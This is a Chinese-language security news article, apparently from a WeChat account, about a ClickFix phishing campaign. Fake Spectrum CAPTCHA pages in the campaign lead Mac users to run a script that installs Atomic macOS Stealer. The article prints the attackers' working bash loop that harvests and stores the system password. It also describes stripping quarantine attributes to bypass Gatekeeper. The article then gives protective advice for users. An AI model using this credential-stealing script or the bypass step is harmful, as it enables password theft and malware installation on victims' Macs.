“ 钓鱼伪装运营商。”
PS:有内网web自动化需求可以私信
01
—
导语
曾几何时,Mac用户总爱炫耀“我这辈子没见过杀毒软件”,如今这句话却成了最危险的flag。网络安全研究人员最近发出紧急警报:一场针对苹果用户的大规模恶意软件攻击正在蔓延,攻击者利用名为 “ClickFix” 的社会工程策略,诱骗用户下载 Atomic macOS Stealer(AMOS) 信息窃取程序。
令人担忧的是,仅过去一年Mac恶意软件数量已暴增300%,苹果引以为傲的安全防线正被黑客层层击破。
一.完美骗局:从“验证码错误”到系统沦陷
这场攻击的起点,看起来再平常不过。当用户访问伪装成美国电信提供商Spectrum的网站(如“panel-spectrum[.]net”或“spectrum-ticket[.]net”)时,会看到一个要求完成hCaptcha验证的页面,提示需要“检查连接安全性”才能继续。
但无论用户如何操作,页面都会弹出 “CAPTCHA verification failed” (验证码验证失败)的错误信息,随后建议用户点击一个 “Alternative Verification”(替代验证)按钮。
一旦点击,精心设计的陷阱立即启动:
-
恶意命令被悄无声息地复制到剪贴板:用户毫无察觉
-
显示量身定制的操作指南:根据用户操作系统显示不同指令
-
对Mac用户的致命诱导:引导用户打开终端(Terminal)并运行恶意shell脚本
二.致命脚本:密码窃取与系统沦陷
当Mac用户按照指示在终端运行脚本后,真正的噩梦开始。脚本会反复要求用户输入系统密码,直到输入正确为止。以下是黑客使用的核心密码窃取代码:
#!/bin/bash
username=$(whoami)
while true; do
echo -n “System Password: ”
read password
echo
if dscl . -authonly “$username” “$password” >/dev/null 2>&1; then
echo -n “$password” > /tmp/.pass
break
else
echo “Incorrect password! Try again.”
fi
done
这段代码利用macOS原生的dscl命令验证密码真伪,用户输入的正确密码会被存储在/tmp/.pass文件中。
获得密码后,攻击进入第二阶段:
-
下载AMOS恶意软件
-
使用窃取的密码执行
sudo -S xattr -c命令,移除文件的隔离属性,绕过苹果的Gatekeeper安全机制 -
执行恶意二进制文件,彻底控制受害者的Mac
三.谁在幕后?俄语黑客与草率线索
安全研究人员在分析恶意软件源代码时发现了俄语注释,表明这很可能是俄语网络犯罪团伙所为。
虽然攻击手法专业,但攻击者部署的钓鱼网站却暴露出一些破绽:
-
平台指令混乱:向Linux用户代理显示PowerShell命令
-
向Windows和Mac用户同时显示“按住Windows键+R”的提示
-
前端逻辑存在多处不一致
安全研究员Koushik Pal指出:“交付站点中逻辑实施不当,如跨平台指令不匹配,表明基础设施是仓促搭建的。”
四.为什么这次攻击如此危险?
与以往单纯窃取个人信息的恶意软件不同,AMOS窃取活动具有更严重的潜在威胁:
-
企业级危害:获取的macOS系统密码可能被用于访问企业VPN、内部系统和资源,为攻击者打开进入公司网络的大门
-
社交工程攻击:盗取账户后,黑客会利用受害者身份实施 “角色扮演”式诈骗,欺骗联系人列表中的亲友同事
-
安全机制失效:恶意软件使用macOS原生命令窃取凭证并绕过安全措施,传统安全软件难以检测
-
跨平台特性:同一钓鱼活动针对不同操作系统提供定制化攻击载荷,Windows用户会被诱导执行PowerShell命令
五.ClickFix:黑客的“万能钥匙”攻击手法
Atomic Stealer攻击只是利用ClickFix技术的众多恶意活动之一。过去一年,采用这种手法的攻击活动激增,成为黑客突破安全防线的“利器”。
ClickFix攻击的经典流程:
用户访问恶意链接显示虚假验证码提示验证失败诱导点击“替代验证”复制恶意命令到剪贴板显示执行指令用户执行命令系统被入侵
安全公司Darktrace发现,ClickFix攻击已在欧洲、中东、非洲和美国的客户环境中广泛出现。这些活动不断演变,但最终目标始终是投放恶意载荷——从木马、信息窃取程序到勒索软件。
就在最近,还有攻击者仿冒Booking.com,针对酒店连锁和餐饮服务行业发起钓鱼邮件攻击,同样使用虚假验证码传播恶意软件。
苹果用户自救指南
面对日益狡猾的Mac恶意软件,仅靠苹果内置防护已不足够。以下防护措施至关重要:
-
警惕“验证失败”陷阱:遇到验证码错误后要求“替代验证”的网站,立即关闭页面
-
绝不盲从终端指令:任何要求你在终端输入密码的网页指令,一律视为高危操作
-
启用双重认证:为所有重要账户(尤其是Apple ID)开启双因素认证
-
定期检查系统更新:每周确认macOS是否更新至最新版本,及时修补漏洞
-
戒除破解软件依赖:盗版软件和破解工具是恶意软件传播主要渠道
-
安装专业安全软件:选择信誉良好的Mac安全解决方案,提供实时防护
-
敏感操作三思而行:对“限时免费”、“老板急件”、“系统崩溃警告”等诱导性信息保持警惕
安全专家强调:“这世上没有攻不破的系统,只有不设防的用户。”苹果的安全神话已被打破,用户需清醒认识到:在黑客眼中,裸奔的Mac已成为最诱人的攻击目标。
免责声明:
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助
第十二条: 国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。
第十三条: 国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。
原文始发于微信公众号(道玄网安驿站):警惕!新型Atomic恶意软件借“验证码”入侵Mac,苹果用户紧急避坑
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论